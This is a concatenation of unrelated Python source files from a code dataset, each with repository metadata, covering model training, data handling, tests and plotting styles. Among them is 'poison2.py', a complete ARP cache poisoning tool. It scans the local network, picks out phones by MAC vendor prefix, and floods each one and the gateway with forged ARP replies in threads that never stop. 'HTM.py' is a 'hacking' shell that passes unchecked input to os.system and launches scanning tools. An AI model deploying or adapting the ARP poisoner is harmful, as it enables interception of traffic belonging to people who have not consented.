'dbpedia':\n target_label1 = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']\nelif config.data_name == 'yelp_p':\n target_label1 = ['0', '1']\n\nclass LossCallBack(Callback):\n \"\"\"\n Monitor the loss in training.\n\n If the loss is NAN or INF terminating training.\n\n Note:\n If per_print_times is 0 do not print loss.\n\n Args:\n per_print_times (int): Print loss every times. Default: 1.\n \"\"\"\n def __init__(self, per_print_times=1, rank_ids=0):\n super(LossCallBack, self).__init__()\n if not isinstance(per_print_times, int) or per_print_times < 0:\n raise ValueError(\"print_step must be int and >= 0.\")\n self._per_print_times = per_print_times\n self.rank_id = rank_ids\n global time_stamp_init, time_stamp_first\n if not time_stamp_init:\n time_stamp_first = get_ms_timestamp()\n time_stamp_init = True\n\n def step_end(self, run_context):\n \"\"\"Monitor the loss in training.\"\"\"\n global time_stamp_first\n time_stamp_current = get_ms_timestamp()\n cb_params = run_context.original_args()\n print(\"time: {}, epoch: {}, step: {}, outputs are {}\".format(time_stamp_current - time_stamp_first,\n cb_params.cur_epoch_num,\n cb_params.cur_step_num,\n str(cb_params.net_outputs)))\n with open(\"./loss_{}.log\".format(self.rank_id), \"a+\") as f:\n f.write(\"time: {}, epoch: {}, step: {}, loss: {}\".format(\n time_stamp_current - time_stamp_first,\n cb_params.cur_epoch_num,\n cb_params.cur_step_num,\n str(cb_params.net_outputs.asnumpy())))\n f.write('\\n')\n\n\nclass FastTextInferExportCell(nn.Cell):\n \"\"\"\n Encapsulation class of FastText network infer.\n\n Args:\n network (nn.Cell): FastText model.\n\n Returns:\n Tuple[Tensor, Tensor], predicted_ids\n \"\"\"\n def __init__(self, network):\n super(FastTextInferExportCell, self).__init__(auto_prefix=False)\n self.network = network\n self.argmax = P.ArgMaxWithValue(axis=1, keep_dims=True)\n self.log_softmax = nn.LogSoftmax(axis=1)\n\n def construct(self, src_tokens, src_tokens_lengths):\n \"\"\"construct fasttext infer cell\"\"\"\n prediction = self.network(src_tokens, src_tokens_lengths)\n predicted_idx = self.log_softmax(prediction)\n predicted_idx, _ = self.argmax(predicted_idx)\n\n return predicted_idx\n\n\ndef _build_training_pipeline(pre_dataset, run_distribute=False):\n \"\"\"\n Build training pipeline\n\n Args:\n pre_dataset: preprocessed dataset\n \"\"\"\n net_with_loss = FastTextNetWithLoss(config.vocab_size, config.embedding_dims, config.num_class)\n net_with_loss.init_parameters_data()\n if config.pretrain_ckpt_dir:\n parameter_dict = load_checkpoint(config.pretrain_ckpt_dir)\n load_param_into_net(net_with_loss, parameter_dict)\n if pre_dataset is None:\n raise ValueError(\"pre-process dataset must be provided\")\n\n #get learning rate\n update_steps = config.epoch * pre_dataset.get_dataset_size()\n decay_steps = pre_dataset.get_dataset_size()\n rank_size = os.getenv(\"RANK_SIZE\")\n if isinstance(rank_size, int):\n raise ValueError(\"RANK_SIZE must be integer\")\n if rank_size is not None and int(rank_size) > 1:\n base_lr = config.lr\n else:\n base_lr = config.lr / 10\n print(\"+++++++++++Total update steps \", update_steps)\n lr = Tensor(polynomial_decay_scheduler(lr=base_lr,\n min_lr=config.min_lr,\n decay_steps=decay_steps,\n total_update_num=update_steps,\n warmup_steps=config.warmup_steps,\n power=config.poly_lr_scheduler_power), dtype=mstype.float32)\n optimizer = Adam(net_with_loss.trainable_params(), lr, beta1=0.9, beta2=0.999)\n\n net_with_grads = FastTextTrainOneStepCell(net_with_loss, optimizer=optimizer)\n net_with_grads.set_train(True)\n model = Model(net_with_grads)\n loss_monitor = LossCallBack(rank_ids=config.rank_id)\n dataset_size = pre_dataset.get_dataset_size()\n time_monitor = TimeMonitor(data_size=dataset_size)\n ckpt_config = CheckpointConfig(save_checkpoint_steps=decay_steps * config.epoch,\n keep_checkpoint_max=config.keep_ckpt_max)\n callbacks = [time_monitor, loss_monitor]\n if not run_distribute:\n ckpt_callback = ModelCheckpoint(prefix='fasttext',\n directory=os.path.join(config.save_ckpt_dir,\n 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\"))),\n config=ckpt_config)\n callbacks.append(ckpt_callback)\n if run_distribute and MultiDevice.get_rank() % 8 == 0:\n ckpt_callback = ModelCheckpoint(prefix='fasttext',\n directory=os.path.join(config.save_ckpt_dir,\n 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\"))),\n config=ckpt_config)\n callbacks.append(ckpt_callback)\n print(\"Prepare to Training....\")\n epoch_size = pre_dataset.get_repeat_count()\n print(\"Epoch size \", epoch_size)\n if run_distribute:\n print(f\" | Rank {MultiDevice.get_rank()} Call model train.\")\n model.train(epoch=config.epoch, train_dataset=pre_dataset, callbacks=callbacks, dataset_sink_mode=False)\n\n\ndef train_single(input_file_path):\n \"\"\"\n Train model on single device\n Args:\n input_file_path: preprocessed dataset path\n \"\"\"\n print(\"Staring training on single device.\")\n preprocessed_data = load_dataset(dataset_path=input_file_path,\n batch_size=config.batch_size,\n epoch_count=config.epoch_count,\n bucket=config.buckets)\n _build_training_pipeline(preprocessed_data)\n\n\ndef set_parallel_env():\n context.reset_auto_parallel_context()\n MultiDevice.init()\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL,\n device_num=MultiDevice.get_group_size(),\n gradients_mean=True)\n\ndef train_paralle(input_file_path):\n \"\"\"\n Train model on multi device\n Args:\n input_file_path: preprocessed dataset path\n \"\"\"\n set_parallel_env()\n print(\"Starting traning on multiple devices. |~ _ ~| |~ _ ~| |~ _ ~| |~ _ ~|\")\n batch_size = config.batch_size\n if config.device_target == 'GPU':\n batch_size = config.distribute_batch_size_gpu\n\n preprocessed_data = load_dataset(dataset_path=input_file_path,\n batch_size=batch_size,\n epoch_count=config.epoch_count,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank(),\n bucket=config.buckets,\n shuffle=False)\n _build_training_pipeline(preprocessed_data, True)\n\n\ndef modelarts_pre_process():\n '''modelarts pre process function.'''\n def unzip(zip_file, save_dir):\n import zipfile\n s_time = time.time()\n if not os.path.exists(os.path.join(save_dir, config.modelarts_dataset_unzip_name)):\n zip_isexist = zipfile.is_zipfile(zip_file)\n if zip_isexist:\n fz = zipfile.ZipFile(zip_file, 'r')\n data_num = len(fz.namelist())\n print(\"Extract Start...\")\n print(\"unzip file num: {}\".format(data_num))\n data_print = int(data_num / 100) if data_num > 100 else 1\n i = 0\n for file in fz.namelist():\n if i % data_print == 0:\n print(\"unzip percent: {}%\".format(int(i * 100 / data_num)), flush=True)\n i += 1\n fz.extract(file, save_dir)\n print(\"cost time: {}min:{}s.\".format(int((time.time() - s_time) / 60),\n int(int(time.time() - s_time) % 60)))\n print(\"Extract Done.\")\n else:\n print(\"This is not zip.\")\n else:\n print(\"Zip has been extracted.\")\n\n if config.need_modelarts_dataset_unzip:\n zip_file_1 = os.path.join(config.data_path, config.modelarts_dataset_unzip_name + \".zip\")\n save_dir_1 = os.path.join(config.data_path)\n\n sync_lock = \"/tmp/unzip_sync.lock\"\n\n # Each server contains 8 devices as most.\n if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock):\n print(\"Zip file path: \", zip_file_1)\n print(\"Unzip file save dir: \", save_dir_1)\n unzip(zip_file_1, save_dir_1)\n print(\"===Finish extract data synchronization===\")\n try:\n os.mknod(sync_lock)\n except IOError:\n pass\n\n while True:\n if os.path.exists(sync_lock):\n break\n time.sleep(1)\n\n print(\"Device: {}, Finish sync unzip data from {} to {}.\".format(get_device_id(), zip_file_1, save_dir_1))\n\n config.save_ckpt_dir = os.path.join(config.output_path, config.save_ckpt_dir)\n\n\n@moxing_wrapper(pre_process=modelarts_pre_process)\ndef run_train():\n '''run train.'''\n config.rank_id = int(os.environ.get(\"RANK_ID\", \"0\"))\n if config.run_distribute:\n train_paralle(config.dataset_path)\n else:\n train_single(config.dataset_path)\n\ndef run_fasttext_export():\n \"\"\"export function\"\"\"\n fasttext_model = FastText(config.vocab_size, config.embedding_dims, config.num_class)\n print(\"================config.ckpt_file===========\")\n ckpt_dir = os.path.join(config.train_url, 'ckpt_{}'.format(os.getenv(\"DEVICE_ID\")))\n config.ckpt_file = os.path.join(ckpt_dir, 'fasttext-5_35.ckpt')\n parameter_dict = load_checkpoint(config.ckpt_file)\n load_param_into_net(fasttext_model, parameter_dict)\n ft_infer = FastTextInferExportCell(fasttext_model)\n batch_size = 1\n if config.data_name == \"ag\":\n src_tokens_shape = [batch_size, 467]\n src_tokens_length_shape = [batch_size, 1]\n elif config.data_name == 'dbpedia':\n src_tokens_shape = [batch_size, 1120]\n src_tokens_length_shape = [batch_size, 1]\n elif config.data_name == 'yelp_p':\n src_tokens_shape = [batch_size, 2955]\n src_tokens_length_shape = [batch_size, 1]\n\n file_name = os.path.join(config.train_url, config.file_name + '_' + config.data_name)\n src_tokens = Tensor(np.ones((src_tokens_shape)).astype(np.int32))\n src_tokens_length = Tensor(np.ones((src_tokens_length_shape)).astype(np.int32))\n export(ft_infer, src_tokens, src_tokens_length, file_name=file_name, file_format='AIR')\n\n\nif __name__ == \"__main__\":\n run_train()\n run_fasttext_export()\n","sub_path":"research/nlp/fasttext/modelarts/train_start.py","file_name":"train_start.py","file_ext":"py","file_size_in_byte":13434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"215265593","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport Scripts.git as git\nimport Scripts.nmap as nmap\nimport Scripts.matrix as matrix\nimport Scripts.TextDisplay as TextDisp\nprof = True\nimport Settings\ntry:\n\tos.chdir(os.path.dirname(sys.argv[0]))\nexcept:\n\tprint(\"couldn't nav to correct dir, May be running inside the HTM file\")\ndef YENO(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\nos.system(\"clear\")\nif prof == True:\n\tTextDisp.run()\nelse:\n\tTextDisp.IAmAPussy()\nn = \"\"\nwhile n.strip() != 'exit':\n\tn = raw_input(\"HTM > \")\n\n\tif n == \"matrix\" or n == \"Matrix\":\n\t\tmatrix.run()\n\t\tprint(\"Mainframe Hacked\")\n\telif n == \"modules\":\n\t\tprint(\"\"\"\n\t\tMatrix - Displays a matrix, Makes you look cool\n\t\tnmap - Not Fully Implemented\n\t\tnikto - Not Fully Implemented\n\t\tcmc - Custom command, Allows overideing modules\n\t\t\"\"\")\n\telif n == \"git\":\n\t\tgit.run()\n\telif n == \"ls\":\n\t\tos.system(\"ls\")\n\telif n == \"nmap\":\n\t\tnmap.run()\n\telif n == \"cd\":\n\t\ttry:\n\t\t\tos.chdir(raw_input(\"Dir to move to: \"))\n\t\texcept:\n\t\t\tprint(\"Error, Check your path with 'ls'\")\n\n\telif n == \"cmc\":\n\t\tcmc = raw_input(\"Custom Command: \")\n\t\tos.system(cmc)\n\telif n == \"nikto\":\n\t\tos.system(\"python Scripts/nikto.py\")\n\telif n == \"clear\":\n\t\tos.system(\"clear\")\n\t\tTextDisp.run()\n\telif n == \"sqlmap\":\n\t\tos.system(\"python Scripts/SQLmap.py\")\n\telif n == \"TOF\":\n\t\tos.system(\"python Scripts/TOF.py\")\n\telif n == \"Tetris\":\n\t\tos.system(\"python Scripts/Tetris.py\")\n\telse:\n\t\tos.system(n)\n","sub_path":"HTM/HTM.py","file_name":"HTM.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"155402128","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndf=pd.DataFrame({\n \"key1\":[\"a\",\"a\",\"b\",\"b\",\"a\"],\n \"key2\":[\"one\",\"two\",\"one\",\"two\",\"one\"],\n \"data1\":np.random.randn(5),\n \"data2\":np.random.randn(5)\n})\n\n#元祖第一个元素是由键值组\nfor (k1,k2),group in df.groupby([\"key1\",\"key2\"]):\n print(k1,k2)\n print(group)","sub_path":"python_self/数据挖掘/Pandas库/数据分组/遍历分组/迭代多层次的GroupBy对象.py","file_name":"迭代多层次的GroupBy对象.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"599081385","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.naive_bayes import GaussianNB\nimport pickle\n\ndef training():\n def filter_label_tag(label_list):\n if label_list[0] == 1:\n return 'Pouca'\n if label_list[1] == 1:\n return 'Moderada'\n if label_list[2] == 1:\n return 'Nemhuma'\n if label_list[3] == 1:\n return 'Alta'\n\n dataframe = pd.read_csv('Cleaned-Data.csv')\n severity_columns = dataframe.filter(like='Severity_').columns\n\n dataframe['Condition'] = dataframe[severity_columns].values.tolist()\n\n dataframe_list = dataframe.values.tolist()\n\n training_features_list = []\n training_labels_list = []\n correction_features_list = []\n correction_labels_list = []\n index = 0\n\n classifier = GaussianNB()\n\n for data in dataframe_list:\n features_frame = data[0:8]\n label_frame = filter_label_tag(data[27])\n if index < 252800:\n training_features_list.append(features_frame)\n training_labels_list.append(label_frame)\n else:\n correction_features_list.append(features_frame)\n correction_labels_list.append(label_frame)\n index += 1\n\n classifier.fit(training_features_list, training_labels_list)\n\n f = open('my_classifier.pickle', 'wb')\n pickle.dump(classifier, f)\n f.close()","sub_path":"training_model.py","file_name":"training_model.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"408199298","text":"import sys\nimport os \ndir_path = os.path.dirname(os.path.realpath(__file__))\nsrc_path = os.path.join(dir_path[:len(dir_path) - len('sandbox')], 'src')\nsys.path.append(src_path)\n\nimport numpy as np\nimport rl_bot\n\n\n# Fake action_space class\n\nclass ActionSpace(object):\n def sample(self):\n return np.array([0])\n\n\n# Main\n\ndef main():\n bot = rl_bot.TestBot(ActionSpace(), 0.0)\n for i_episode in range(2000):\n # Reset bot and environment\n bot.new_game()\n\n # Play episode\n for t in range(20):\n # Action-Reward loop\n action = bot.action(random_observation())\n reward = (-1 * np.sum(action))\n bot.reward(reward)\n\n # Learn from experience\n bot.game_over()\n\n # Has the bot figured it out?\n bot_action = bot.action(random_observation(), True)\n output = np.sum(bot_action)\n\n if i_episode % 20 == 0:\n print ('\\toutput {0}: {1}{2}'.format(str(i_episode).zfill(3), '-' if output < 0 else ' ', round(abs(output), 3)))\n\n if output < -100:\n print ('Bot has learned it! Policy gradients!')\n print ('proved w/ action: {0}'.format(bot_action))\n print ('Learned after {0} episodes'.format(i_episode + 1))\n break\n\n\ndef random_observation():\n # return np.array([1])\n return np.random.rand(2)\n\n\n# Script handle\n\nif __name__ == '__main__':\n main()","sub_path":"sandbox/policy_gradients_test.py","file_name":"policy_gradients_test.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"30924280","text":"# -*- coding: utf-8 -*-\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom generic import GenericRequired\n\n\nclass BalanceRequired(GenericRequired):\n\n def period_start(self):\n success = False\n\n if 'period_start' in getattr(self.request, self._method):\n success = True\n self._params['period_start'] = getattr(self.request, self._method)['period_start']\n else:\n self['title'] = u'Ошибка приложения'\n self['message'] = u'Начальный период не пришёл от frontend'\n\n return success\n\n def period_end(self):\n success = False\n\n if 'period_end' in getattr(self.request, self._method):\n success = True\n self._params['period_end'] = getattr(self.request, self._method)['period_end']\n else:\n self['title'] = u'Ошибка приложения'\n self['message'] = u'Конечный период не пришёл от frontend'\n\n return success\n","sub_path":"backend/lib/required/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"255335937","text":"from typing import Tuple\n\nimport numpy as np\nfrom qtpy.QtCore import QModelIndex, Qt\n\nfrom napari._qt.containers import QtLayerList\nfrom napari.components import LayerList\nfrom napari.layers import Image\n\n\ndef test_set_layer_invisible_makes_item_unchecked(qtbot):\n view, image = make_qt_layer_list_with_layer(qtbot)\n assert image.visible\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Checked\n\n image.visible = False\n\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Unchecked\n\n\ndef test_set_item_unchecked_makes_layer_invisible(qtbot):\n view, image = make_qt_layer_list_with_layer(qtbot)\n assert check_state_at_layer_index(view, 0) == Qt.CheckState.Checked\n assert image.visible\n\n view.model().setData(\n layer_to_model_index(view, 0),\n Qt.CheckState.Unchecked,\n Qt.ItemDataRole.CheckStateRole,\n )\n\n assert not image.visible\n\n\ndef make_qt_layer_list_with_layer(qtbot) -> Tuple[QtLayerList, Image]:\n image = Image(np.zeros((4, 3)))\n layers = LayerList([image])\n view = QtLayerList(layers)\n qtbot.addWidget(view)\n return view, image\n\n\ndef layer_to_model_index(view: QtLayerList, layer_index: int) -> QModelIndex:\n return view.model().index(layer_index, 0, view.rootIndex())\n\n\ndef check_state_at_layer_index(\n view: QtLayerList, layer_index: int\n) -> Qt.CheckState:\n model_index = layer_to_model_index(view, layer_index)\n value = view.model().data(model_index, Qt.ItemDataRole.CheckStateRole)\n # The data method returns integer value of the enum in some cases, so\n # ensure it has the enum type for more explicit assertions.\n return Qt.CheckState(value)\n","sub_path":"napari/_qt/containers/_tests/test_qt_layer_list.py","file_name":"test_qt_layer_list.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"632950968","text":"from pygments.formatters.terminal256 import Terminal256Formatter\nfrom pygments.style import Style\nfrom pygments.token import (Comment, Error, Generic, Keyword, Name,\n Number, Operator, String)\n\n\n# Hack: pygments requires hex color codes, which will be converted to\n# terminal color code with Terminal256Formatter. I would like to have\n# base16 colors, so I use this to control the color code I will get.\n# Note: it is impossible to get 16 this way. It has the same hex code as\n# 0, so it will never get used. 3 is a good replacement for that.\n_color_table = [\n '#{:02x}{:02x}{:02x}'.format(r, g, b)\n for r, g, b in Terminal256Formatter().xterm_colors\n]\n\n\ndef color(fg=None, bg=None, extra=None):\n s = []\n if fg is not None:\n s.append(_color_table[fg])\n if bg is not None:\n s.append('bg:' + _color_table[bg])\n if extra is not None:\n s.append(extra)\n return ' '.join(s)\n\n\nclass Base16TerminalStyle(Style):\n styles = {\n Comment.Preproc: color(3),\n Comment.Special: color(6),\n Comment: color(8),\n Error: color(1),\n Generic.Error: color(1),\n Generic.Traceback: color(1),\n Keyword.Type: color(3),\n Keyword: color(5),\n Name.Builtin: color(4),\n Name.Decorator: color(5),\n Name.Exception: color(1),\n Name.Function: color(4),\n Number: color(3),\n Operator.Word: color(5),\n String.Escape: color(17),\n String.Interpol: color(17),\n String: color(2),\n }\n","sub_path":"pythonlocal/pygments_style_base16.py","file_name":"pygments_style_base16.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"107990876","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom os import listdir\nfrom os.path import join\nimport functions as f\n\n#Set plot style\nplt.rcParams.update({'font.size': 20})\nfig, ax = plt.subplots(figsize=(8,6))\ndash = '--'\nline = '-'\ncolor = ['r',(0.8,0.52,0),(0.8,0.8,0),(0,0.8,0),'b',(111/255, 0, 255/255),(238/255,130/255,238/255),'k']\n\n#Load Datas\nprint(\"Please input the desired directory:\")\n#path = 'Well_Mixed'\npath = 'TwoLayer'\nDatas = f.Import_Datas(path)\n\n#Main code to plot\nf.Plot_AttCur_Fill(fig, ax, Datas[:int(len(Datas)/2)],'b','dashed',LABEL=\"Dust growth scenario\")\nf.Plot_AttCur_Fill(fig, ax, Datas[int(len(Datas)/2):],'r','solid' ,LABEL=\"Star dust scenario\")\n\n#Plot legends\nExt_SD = np.loadtxt('./Observation_Datas/Extinction_Curve/ext_yenhsing_stellar.dat')\nExt_DG = np.loadtxt('./Observation_Datas/Extinction_Curve/ext_yenhsing_accretion.dat')\nROW = f.Find_Lambda_ROW(0.3, Ext_DG)\nax.plot(1/Ext_DG[:,0],Ext_DG[:,3]/Ext_DG[ROW,3],color='r',linestyle='dashed',label=\"Ext. curve of D.G. scenario\", zorder=2)\nax.plot(1/Ext_SD[:,0],Ext_SD[:,3]/Ext_SD[ROW,3],color='r',linestyle='solid',label=\"Ext. curve of S.D. scenario\", zorder=2)\n#f.Plot_Ext()\n\n#Show SMC and Calzetti curves\nSMC = np.loadtxt('./Observation_Datas/pei_smc.dat')\nCalzetti = np.loadtxt('./Observation_Datas/calzetti.dat')\nLine_SMC = ax.plot(SMC[:,0], SMC[:,2]/1.9, color = (0.4,0.4,0.4), linestyle=':', label='SMC extinction curve', linewidth=3, zorder=2)\nLine_Cal = ax.plot(1/Calzetti[:,0], Calzetti[:,1], color = (0.2,0.2,0.2), linestyle=':', label='Calzetti attenuation curve', linewidth=3, zorder=2)\n\n#Show the beta wavelengths\nB_short = ax.vlines(x=1/0.16, ymin=0, ymax=10, colors=(0.8,0.8,0.8), linestyle='solid')\nB_long = ax.vlines(x=1/0.25, ymin=0, ymax=10, colors=(0.8,0.8,0.8), linestyle='solid')\n\nhandles, labels = plt.gca().get_legend_handles_labels()\norder = [4,5,2,3,0,1]\nplt.legend([handles[idx] for idx in order],[labels[idx] for idx in order],loc=2,prop={'size': 15})\n\n\n#Set plot style\n#plt.legend(loc=2,prop={'size': 15})\n#plt.title(\"Attenuation Curve \\n (Normalized at {:4f} $\\mu m$)\".format(Datas[ROW,0]))\nplt.xlabel(r'$1/\\lambda$ $(\\mu m^{-1})$')\nplt.ylabel(r'$A/A_{3000 \\AA}$')\nplt.xlim([0.3,10])\nplt.ylim([0,10])\nplt.tight_layout()\nplt.savefig(str(path+\"_Attcur.png\"),dpi=300)\n#plt.show()\nprint('OK!')\n","sub_path":"plot_att.py","file_name":"plot_att.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"490120337","text":"stopwords = ['데/NNB', '좀/MAG', '수/NNB', '등/NNB']\ndef clean_stopword_text(reviews):\n corpus = []\n for review in reviews:\n modi_sent = []\n for word in str(review).split(' '):\n if word not in stopwords:\n modi_sent.append(word)\n corpus.append(' '.join(modi_sent))\n return corpus\n\n\nimport pandas as pd\nfilepath = '\"./_reviews.csv\"'\ndf = pd.read_csv(filepath)\n\ndf['review'] = clean_stopword_text(df['review'])\ndf.to_csv(\"9\" + filepath, index=False)","sub_path":"pjt2/MechineLearning/etc/etc/tpu/preprocess/9_clean_stopword_text.py","file_name":"9_clean_stopword_text.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"579452998","text":"import sys\nimport os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import roc_curve, auc\nsys.path.append('/home/ubuntu/fubar')\nfrom cnn_toolkit import contiguous_true_vs_predicted, get_fresh_weights_and_model, filepattern\n\n\ndef roc_curve_data(model,\n positive_class,\n negative_class,\n tts):\n \"\"\"\n saves roc curve data to 3 separate text files (fpr, tpr and thresholds)\n :param model: Model instance implementing predict method\n :param positive_class: string specifying positive class name\n :param negative_class: string specifying negative class name\n :param tts: test pd.DataFrame from file_train_test_split\n :return:\n \"\"\"\n\n y_true, y_pred = contiguous_true_vs_predicted(\n model,\n positive_class,\n negative_class,\n tts=tts\n )\n\n fpr, tpr, thresholds = roc_curve(y_true, y_pred)\n\n print(f'AUC is {auc(fpr, tpr)}')\n\n np.savetxt(filepattern('fpr_', '.txt'), fpr)\n np.savetxt(filepattern('tpr_', '.txt'), tpr)\n np.savetxt(filepattern('thresholds_', '.txt'), thresholds)\n\n\ndef load_roc_curve(fpr_txt=None, tpr_txt=None, thresholds_txt=None):\n\n def sub(arg, strg):\n if arg is None:\n res = np.loadtxt(filepattern(strg, '.txt'))\n else:\n res = np.loadtxt(strg)\n return res\n\n fpr = sub(fpr_txt, 'fpr_')\n tpr = sub(tpr_txt, 'tpr_')\n thresholds = sub(thresholds_txt, 'thresholds_')\n\n return fpr, tpr, thresholds\n\n\nif __name__ == '__main__':\n\n cwd = os.getcwd()\n os.chdir('/home/ubuntu/fubar')\n\n m, w = get_fresh_weights_and_model(os.getcwd(), 'model_allfreeze*', 'weights_allfreeze*')\n with open(m, 'r') as f:\n model = tf.keras.models.model_from_json(f.read())\n model.load_weights(w)\n\n _, t = get_fresh_weights_and_model(os.getcwd(), 'train*.csv', 'test*.csv')\n # above function can be also used to get file names of the freshest train and test sets\n test_set = pd.read_csv(t)\n\n roc_curve_data(model, 'locked', 'freelocked', test_set)\n\n os.chdir(cwd)","sub_path":"benchmarks/bench_CLF.py","file_name":"bench_CLF.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"96296405","text":"#!/usr/bin/env python3\n# ARP Poison v2\n\n# import serious stuff\nimport time\nimport netifaces\nimport netaddr\nimport ipaddress\nimport threading\nfrom scapy.all import *\nfrom subprocess import Popen, PIPE\n\nimport pdb # debug\nfrom pprint import pprint # debug\n\n\n# probe interfaces, the new way\ndef probe_interfaces():\n # essential variables\n interface_dict = {}\n\n # list available interfaces and remove loopback\n available_interfaces = netifaces.interfaces()\n available_gateways = netifaces.gateways()[netifaces.AF_INET]\n available_interfaces.remove(\"lo\")\n\n for interface in available_interfaces:\n # get all the information about the interface\n interface_details = netifaces.ifaddresses(interface)\n\n # remove interface if it lacks IPv4 stuff\n if not netifaces.AF_INET in interface_details:\n continue\n\n # get gateway address for interface\n for gateway in available_gateways:\n if interface in gateway:\n gateway = gateway[0]\n\n # extract required information from interface_details\n localhost_address = interface_details[netifaces.AF_INET][0][\"addr\"]\n netmask = interface_details[netifaces.AF_INET][0][\"netmask\"]\n\n # generate network address\n network_address = localhost_address \n network_address = network_address[: network_address.rfind(\".\")]\n network_address += \".0\"\n \n # generate interface information dictionary\n interface_dict.update({interface: {\n \"localhost_address\": localhost_address,\n \"netmask\": netmask,\n \"interface\": interface,\n \"gateway\": gateway,\n \"network_address\": network_address\n }})\n\n return interface_dict\n\n\n# we have our own ping function! \ndef check_status(ip_address, interface):\n # status dictionary\n status_dict = {\n \"ip_address\": ip_address,\n \"online\": False,\n \"mac\": None\n }\n\n ping = Popen(\n [\"arping\", \"-I\", interface, \"-c\", \"1\", \"-w\", \"1\", str(ip_address)], \n stdout = PIPE\n )\n\n ping_out = ping.communicate()[0].decode()\n ping_out = ping_out.split(\"\\n\")\n \n # returncode is 0 if ping is succesful, converting to bool\n if ping.returncode == 0:\n status_dict[\"online\"] = True\n mac = ping_out[1]\n mac = mac[mac.index(\"m\")+1 : mac.index(\"(\")]\n status_dict[\"mac\"] = mac\n\n print(status_dict) # debug\n return status_dict \n \n\n# get list of live devices on network\ndef generate_device_dict(network_info):\n # essential variables\n online_devices = {}\n\n cidr_address = netaddr.IPNetwork(\n network_info[\"network_address\"],\n network_info[\"netmask\"]\n )\n network = ipaddress.ip_network(cidr_address)\n\n for ip_address in network.hosts():\n device = check_status(ip_address, network_info[\"interface\"])\n if device[\"online\"]:\n online_devices[str(device[\"ip_address\"])] = device[\"mac\"]\n\n return online_devices\n\n\n# generate list of devices to be attacked\ndef generate_target_dict(device_dict):\n # essential variables\n target_dict = {}\n\n # read MAC file\n mac_list = open(\"mobile-mac_only.txt\").read().split(\"\\n\")\n\n # cleanup the MAC file\n while \"\" in mac_list:\n mac_list.pop(mac_list.index(\"\"))\n\n # find mobiles from device_dict\n for device in device_dict:\n for mac in mac_list:\n if device_dict[device].lower().find(mac.lower()) != -1:\n target_dict[device] = device_dict[device]\n\n return target_dict \n\n\n# attack!\ndef poison(gateway, gateway_mac, target, target_mac):\n # specify target details\n poison_target = ARP()\n poison_target.op = 2\n poison_target.psrc = gateway\n poison_target.pdst = target\n poison_target.hwdst = target_mac\n\n # specify gateway details\n poison_gateway = ARP()\n poison_gateway.op = 2\n poison_gateway.psrc = target\n poison_gateway.pdst = gateway\n poison_gateway.hwdst = gateway_mac\n while True:\n send(poison_target)\n send(poison_gateway)\n time.sleep(2)\n\n\n# the main function\ndef main():\n # essential variables\n interface = \"wlp13s0\"\n\n # get info on current interface\n network_info = probe_interfaces()[interface]\n\n # find all devices on network\n device_dict = generate_device_dict(network_info)\n\n # find mobile devices\n target_dict = generate_target_dict(device_dict)\n\n # find gateway info\n gateway = network_info[\"gateway\"]\n gateway_mac = device_dict[gateway]\n\n # attack!\n for target in target_dict:\n poison_thread = threading.Thread(\n target=poison,\n args=[gateway, gateway_mac, target, target_dict[target]]\n )\n poison_thread.start()\n\n\n# run the main function\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"poison2.py","file_name":"poison2.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"49872136","text":"\"\"\"\nYouTube search.\n\nRun queries on YouTube and return results.\n\"\"\"\n\nimport requests\n\nfrom kochira import config\nfrom kochira.service import Service, background, Config, coroutine\nfrom kochira.userdata import 